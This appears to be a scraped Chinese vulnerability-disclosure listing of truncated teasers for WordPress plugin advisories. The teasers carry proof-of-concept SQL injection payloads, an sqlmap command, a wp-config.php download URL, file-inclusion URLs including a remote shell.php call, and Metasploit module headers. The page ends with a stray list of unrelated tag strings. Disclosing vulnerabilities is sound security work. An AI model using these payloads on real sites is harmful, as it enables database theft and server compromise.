-
# Version: 4.2.2
# Tested on: Ubuntu 16.04
1 – Description:
Type user access: register user.
$_POST[‘CatID’] is not escaped.
Ultimate Product Catalogue 4.2.2 Sql Injection
2 – Proof of Concept:
1 – Login as regular user (created using wp-login.php?action=register):
2 – Using:
*delete “*” in code*
3 – Timeline:
– 22/05/2017 – Discove...阅读全文
-
Advisory ID: DC-2017-01-009
SQL injection
Vulnerable Function: $wpdb->get_var( $query );
Vulnerable Variable: $_POST['cat_search']
Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
Fi...阅读全文
-
1. Description
An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database.
The get oarameter ‘kc_ad’ is vulnerable.
2. Proof of concept
sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0"" —dbms —thread...阅读全文
-
######################
# PoC
######################
# [+] Using `force-download.php` file from `Wordpress websites we can download any file.
#
# [!] http://ihonker.org/force-download.php?file=wp-config.php
#
######################
阅读全文
-
WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability.
<html>
<body>
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />...阅读全文
-
出现漏洞的文件为:abtest_admin.php
<?php
require 'admin/functions.php';
if (isset($_GET['action'])) {
include 'admin/' . $_GET['action'] . '.php';
} else {
include 'admin/list_experiments.php';
}
?>
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
阅读全文
-
POC
远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
阅读全文
-
Description:
The WordPress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it’s own file upload mechanism instead of the wordpress api it’s possible to upload any file type.
##
# This module requires Metasploit: http://metasploit.com/do...阅读全文
-
##
#This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::HTTP::Wordpress
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' ...阅读全文
-
CVE-2015-3421
Description:
High-Tech Bridge Security Research Lab discovered a security vulnerability in the eShop WordPress Plugin, which can be exploited by remote attackers to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in the “eshopc...阅读全文
# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 – Description: Type user access: register user. $_POST[‘CatID’] is not escaped. Ultimate Product Catalogue 4.2.2 Sql Injection 2 – Proof of Concept: 1 – Login as regular user (created using wp-login.php?action=register): 2 – Using: *delete “*” in code* 3 – Timeline: – 22/05/2017 – Discove...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:3,554次 | 标签:wordpress漏洞抢沙发
Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC) Fi...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:2,993次 | 标签:wordpress漏洞
1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter ‘kc_ad’ is vulnerable. 2. Proof of concept sqlmap -u "http://192.168.20.39/wp-content/plugins/kittycatfish/base.css.php?kc_ad=31&ver=2.0"" —dbms —thread...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:3,216次 | 标签:wordpress漏洞
###################### # PoC ###################### # [+] Using `force-download.php` file from `Wordpress websites we can download any file. # # [!] http://ihonker.org/force-download.php?file=wp-config.php # ###################### 阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:6,184次 | 标签:wordpress漏洞
WordPress WP Fastest Cache plugin version 0.8.5.9 suffers from a local file inclusion vulnerability. <html> <body> <form action="http://<target>/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="wpfc_cdn_template_ajax_request" />...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:3,486次 | 标签:wordpress漏洞
POC 远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls 本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini 阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:3,536次 | 标签:wordpress漏洞
Description: The WordPress Front-end Editor plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it’s own file upload mechanism instead of the wordpress api it’s possible to upload any file type. ## # This module requires Metasploit: http://metasploit.com/do...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:4,117次 | 标签:wordpress漏洞
## #This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' ...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:4,624次 | 标签:wordpress漏洞
CVE-2015-3421 Description: High-Tech Bridge Security Research Lab discovered a security vulnerability in the eShop WordPress Plugin, which can be exploited by remote attackers to overwrite arbitrary PHP variables within the context of the vulnerable application. The vulnerability exists due to insufficient validation of user-supplied input in the “eshopc...阅读全文作者:hedysx | 分类:漏洞公布 | 阅读:3,442次 | 标签:wordpress漏洞
cheap coach to great yarmouth:
password:
Mxaol:
zedong:
cyl1053995738:
tbcode:
20130112:
forget:
大耳朵:
yahoho: